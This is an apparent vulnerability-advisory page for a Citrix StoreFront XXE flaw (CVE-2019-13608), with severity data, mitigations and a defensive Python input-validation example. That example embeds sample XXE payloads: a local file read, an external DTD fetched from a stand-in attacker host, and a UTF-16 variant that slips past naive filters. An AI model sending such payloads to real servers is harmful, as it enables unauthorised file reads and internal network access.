
CVE-2019-13608

Severity: High · CISA KEV · Active Exploitation · EUVD Exploited · Ransomware-linked

Published: 29 August 2019
Modified: 06 November 2025
KEV Added: 03 November 2021
CVSS v3.1 Score: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
EPSS Score: 0.7167 (98.8th percentile)
Risk Priority: 78 (weighted 60% EPSS · 20% KEV · 20% CVSS)

Summary

CVE-2019-13608 is a high-severity XML External Entity (XXE) vulnerability in Citrix StoreFront Server, classified as CWE-611 (Improper Restriction of XML External Entity Reference). Its CVSS v3.1 base score is 7.5 (High).

Operationally, its EPSS score places it in the top 1.2% of CVEs by estimated exploit likelihood, and CISA has added it to the Known Exploited Vulnerabilities (KEV) catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).

Deeper analysis

Citrix StoreFront Server versions before 1903, 7.15 LTSR before CU4 (3.12.4000), and 7.6 LTSR before CU8 (3.0.8000) are affected by an XML External Entity vulnerability tracked as CVE-2019-13608 and classified under CWE-611. The flaw received a CVSS v3.1 base score of 7.5 with the vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N.

An unauthenticated remote attacker (AV:N, PR:N, UI:N) can submit crafted XML containing an external entity declaration over the network; when the server-side XML parser resolves that entity, the attacker can read files on the server or reach internal resources the server can connect to. The vector rates the impact as confidentiality only (C:H/I:N/A:N): no integrity or availability impact is scored.

The referenced Citrix advisory CTX251988 describes available updates and configuration changes to resolve the exposure, while inclusion in the CISA Known Exploited Vulnerabilities catalog confirms observed real-world exploitation activity.


Vulnerability details

Citrix StoreFront Server before 1903, 7.15 LTSR before CU4 (3.12.4000), and 7.6 LTSR before CU8 (3.0.8000) allows XXE attacks.

CWE(s): CWE-611 (Improper Restriction of XML External Entity Reference)
KEV Date Added: 03 November 2021

Related Threats

No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.

Affected Assets

Citrix StoreFront Server
1811 up to but not including 1903 · 7.15 LTSR before 3.12.4000 (CU4) · 7.6 LTSR before 3.0.8000 (CU8)

Mitigating Controls (NIST 800-53 r5)

SI-10 Information Input Validation (prevent): Directly requires validation and sanitization of XML input to block external entity declarations that enable the XXE attack described in CVE-2019-13608.

SI-2 Flaw Remediation (prevent): Mandates timely application of the vendor patches described in CTX251988, which eliminate the XXE flaw in the affected Citrix StoreFront versions.

Secure XML parser configuration (prevent): Requires XML parsers to be configured with DTD processing and external entity resolution disabled, directly addressing the root cause of this unauthenticated remote XXE exposure.
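The input-validation and parser-configuration controls above are easiest to reason about in code. What follows is an added example, not Citrix code and not taken from advisory CTX251988: a Python pre-parse check that rejects any request body declaring a DOCTYPE or an external entity (the SI-10 control), placed in front of a parser that does not resolve external entities (the parser-configuration control). StoreFront itself is a .NET application, where the equivalent parser setting is XmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit; the sample request bodies, the attacker.invalid host and the file path below are constructed for illustration. The example also covers one bypass the text does not mention: the same payload sent as UTF-16, which a byte-level search for <!DOCTYPE would miss.

```python
"""Added example (not Citrix StoreFront code): reject XML bodies that declare
DOCTYPE/external entities before parsing, as an SI-10 input-validation layer
in front of a parser that does not resolve external entities."""
import re
import xml.etree.ElementTree as ET

# Constructed sample request bodies for illustration, not captured traffic.
BENIGN = b'<?xml version="1.0"?><request><user>alice</user></request>'
XXE_FILE = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">]>'
    b'<request><user>&xxe;</user></request>'
)
XXE_PARAM = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE r [<!ENTITY % dtd SYSTEM "http://attacker.invalid/x.dtd"> %dtd;]>'
    b'<request/>'
)
# The same file-read payload re-encoded as UTF-16 with a BOM: a byte-level
# search for b"<!DOCTYPE" finds nothing, so decoding must come first.
XXE_UTF16 = XXE_FILE.decode("ascii").encode("utf-16")

# XML requires these keywords in upper case; matching case-insensitively
# costs nothing and also catches malformed probes.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
EXTERNAL_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(%\s*)?([^\s>]+)\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE)
ANY_ENTITY_RE = re.compile(r"<!ENTITY\b", re.IGNORECASE)


def decode_xml_bytes(raw: bytes) -> str:
    """Decode using the BOM or the first bytes, as an XML parser would,
    so UTF-16 payloads are inspected in the same form the parser sees."""
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return raw.decode("utf-16")          # BOM selects the byte order
    if raw.startswith(b"\xef\xbb\xbf"):
        return raw[3:].decode("utf-8")
    if raw[:2] == b"<\x00":                   # UTF-16LE without a BOM
        return raw.decode("utf-16-le")
    if raw[:2] == b"\x00<":                   # UTF-16BE without a BOM
        return raw.decode("utf-16-be")
    return raw.decode("utf-8")


def xxe_findings(raw: bytes) -> list:
    """Return human-readable reasons to reject the document (empty = clean)."""
    text = decode_xml_bytes(raw)
    findings = []
    if DOCTYPE_RE.search(text):
        # Entities can only be declared inside a DOCTYPE, so its presence
        # alone is enough to reject a request body for an API that never
        # needs a DTD.
        findings.append("DOCTYPE declaration present")
    external = EXTERNAL_ENTITY_RE.findall(text)
    for is_param, name, keyword in external:
        kind = "parameter" if is_param else "general"
        findings.append(
            f"external {kind} entity '{name}' declared with {keyword.upper()}")
    internal = len(ANY_ENTITY_RE.findall(text)) - len(external)
    if internal > 0:
        # Internal entities cannot read files but enable entity-expansion
        # (billion laughs) denial of service, so flag them as well.
        findings.append(f"{internal} internal entity declaration(s)")
    return findings


def safe_parse(raw: bytes) -> ET.Element:
    """Validate first, then parse. ElementTree's expat parser does not
    resolve external entities (the reference fails instead), which is the
    defence-in-depth layer if the validation were ever bypassed."""
    findings = xxe_findings(raw)
    if findings:
        raise ValueError("rejected XML input: " + "; ".join(findings))
    # Pass the raw bytes so expat applies its own BOM/encoding detection.
    return ET.fromstring(raw)


if __name__ == "__main__":
    for label, body in [("benign", BENIGN), ("file read", XXE_FILE),
                        ("parameter entity", XXE_PARAM), ("utf-16", XXE_UTF16)]:
        try:
            root = safe_parse(body)
            print(f"{label}: accepted, root <{root.tag}>")
        except ValueError as exc:
            print(f"{label}: {exc}")
```

The pre-parse check rejects on DOCTYPE alone rather than trying to enumerate dangerous entity forms, because an API that never consumes a DTD has no legitimate reason to accept one; the entity-level findings exist so that logs and alerts say what the attacker attempted. Decoding before matching is the part most often skipped in WAF rules and request filters, and it is the difference between the UTF-16 sample being blocked or passed through.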
